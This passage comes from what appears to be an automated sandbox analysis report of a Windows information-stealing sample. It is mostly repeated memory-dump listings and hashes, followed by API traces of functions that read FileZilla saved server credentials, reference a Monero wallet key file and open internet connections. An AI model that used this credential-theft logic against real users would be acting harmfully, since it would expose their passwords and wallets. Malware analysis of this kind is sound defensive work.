                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <@&%
                          • API String ID: 0-1677279910
                          • Opcode ID: c5c8ae1d2d12ad9483a60b2a40c59c00b9829c561461c12ac63a7b6b5f9f0749
                          • Instruction ID: 51109a1ccb40e34816740370e5649d93bf9bea91b223b86370295857aa69425e
                          • Opcode Fuzzy Hash: c5c8ae1d2d12ad9483a60b2a40c59c00b9829c561461c12ac63a7b6b5f9f0749
                          • Instruction Fuzzy Hash: 875126A3F152085BF304587ADD84777B68BD7D4724F2AC23996489B7C9ECBE5C0A0294
                          Function 00E7EE63 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: {Mxz
                          • API String ID: 0-2987298254
                          • Opcode ID: 3784ab3359c02e869a3602831bacb6da35e6a13d4a7226b70ea1d4d83b56016d
                          • Instruction ID: 0d2cdc8b3578bb5e931aa4a417120066772870dad915812d893f4caa485eb507
                          • Opcode Fuzzy Hash: 3784ab3359c02e869a3602831bacb6da35e6a13d4a7226b70ea1d4d83b56016d
                          • Instruction Fuzzy Hash: FC5117F3E056244FF3006968DC4837AB696ABA4720F2B463CCFD8677C5E97A1D0482C6
                          Function 00F8DBDA Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: G)~~
                          • API String ID: 0-370854580
                          • Opcode ID: a8005179bcaad5efe3adfaa0a0589f7c318d0fb085b18f64a8549e0f57d2bbe0
                          • Instruction ID: a7be2eeffede958cdab07c5cb168fc045a72255d72a9f7f7d538dc84aa275dd8
                          • Opcode Fuzzy Hash: a8005179bcaad5efe3adfaa0a0589f7c318d0fb085b18f64a8549e0f57d2bbe0
                          • Instruction Fuzzy Hash: 2A41AFF350C204DFD7147E68EC853BABBE4AF54310F26492ED6D68A280E6754950B787
                          Function 00E70D20 Relevance: .2, Instructions: 238COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c3c6c11ae1cb1f945df3f84f008639c6f167ece5ae8b3db246809b33027b0e7
                          • Instruction ID: c0de37735827492ec0f5f04886bf68efbb33fe8f7e6219fe24ced7ac9041b728
                          • Opcode Fuzzy Hash: 8c3c6c11ae1cb1f945df3f84f008639c6f167ece5ae8b3db246809b33027b0e7
                          • Instruction Fuzzy Hash: BE7136F3A096009FE304AE2CED8527AF7E5EF94320F1A4A3DE9C8D7344E97558058752
                          Function 00E8C6B1 Relevance: .2, Instructions: 231COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 83e791be98c5fab08fffa0e3194df796c6411ccb41909f1edb7263d79443b4a7
                          • Instruction ID: b6b7233cd29b259a9c2e3ba6258a09dc0334f2c44a9800347fca848b230ac21d
                          • Opcode Fuzzy Hash: 83e791be98c5fab08fffa0e3194df796c6411ccb41909f1edb7263d79443b4a7
                          • Instruction Fuzzy Hash: 58617DF3A086109BE7086E2CDC547BEBBD9EF85720F17463DDAC597784E979180082D2
                          Function 00E8222B Relevance: .2, Instructions: 179COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bac22d9a26ddd6c49f7a54a79405f9c36167e6023693245fd611e3dd6a438f64
                          • Instruction ID: 0794e0a4415432f4846a5705e772123936f3ab0e72e6438908d3c90741c6564a
                          • Opcode Fuzzy Hash: bac22d9a26ddd6c49f7a54a79405f9c36167e6023693245fd611e3dd6a438f64
                          • Instruction Fuzzy Hash: 6D5128B3A082149FE3086A19DC45B7BFBE6EBD4720F17453DE6C887780ED7598018696
                          Function 00D9C49A Relevance: .2, Instructions: 155COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d3654f66d07f05a2ec8ff7d2e960f453f895b85ec0ec36d8e5079a355f41794
                          • Instruction ID: 3339ca4ab697efda6496648b0f7af712a17e87e3732eaa6621478f2ebe9726e0
                          • Opcode Fuzzy Hash: 6d3654f66d07f05a2ec8ff7d2e960f453f895b85ec0ec36d8e5079a355f41794
                          • Instruction Fuzzy Hash: F541CEF260C3049BE3147E29DC8577AF7EAEF98720F1A892DE7D483780EA3955008656
                          Function 00E4F124 Relevance: .2, Instructions: 153COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 277a101bce75ba1537c750c278713a0719286a65669e2474f86f177f145dc198
                          • Instruction ID: 7ecb94be5b8f24cb06e93f7786337fefdc4b07f90f8dde74d47f89331450b98f
                          • Opcode Fuzzy Hash: 277a101bce75ba1537c750c278713a0719286a65669e2474f86f177f145dc198
                          • Instruction Fuzzy Hash: F44136F3A186141BE3086A6CEC6177BB7D6EB58351F2A453EEA89D3784F8394D014286
                          Function 00AF9750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00AF0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00B00DBA,00B00DB7,00B00DB6,00B00DB3), ref: 00AF0362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF0369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00AF0385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00AF03CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF03DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00AF0419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00AF0463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00AF0562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00AF0571
                          • lstrcat.KERNEL32(?,url: ), ref: 00AF0580
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF0593
                          • lstrcat.KERNEL32(?,00B01678), ref: 00AF05A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF05B5
                          • lstrcat.KERNEL32(?,00B0167C), ref: 00AF05C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00AF05D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF05E6
                          • lstrcat.KERNEL32(?,00B01688), ref: 00AF05F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00AF0604
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF0617
                          • lstrcat.KERNEL32(?,00B01698), ref: 00AF0626
                          • lstrcat.KERNEL32(?,00B0169C), ref: 00AF0635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 64ee9fa268b969812a7ecc7e920b771e459a30a976c991f559d85659bcaa24be
                          • Instruction ID: 78b427bbe0b5d3bf376dd59cdd8b407cd63ff2fd53b958215104d94a536dd303
                          • Opcode Fuzzy Hash: 64ee9fa268b969812a7ecc7e920b771e459a30a976c991f559d85659bcaa24be
                          • Instruction Fuzzy Hash: A7D130B190020CABCB14FBE4DE96EFEB778EF24340F404558F606A7195DE74AA06DB61
                          Function 00AE5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                            • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AE59F8
                          • StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0179E2B8,00000000,?,01799DC0,00000000,?,00B01A1C), ref: 00AE5E71
                          • lstrlen.KERNEL32(00000000), ref: 00AE5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AE5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE5E9A
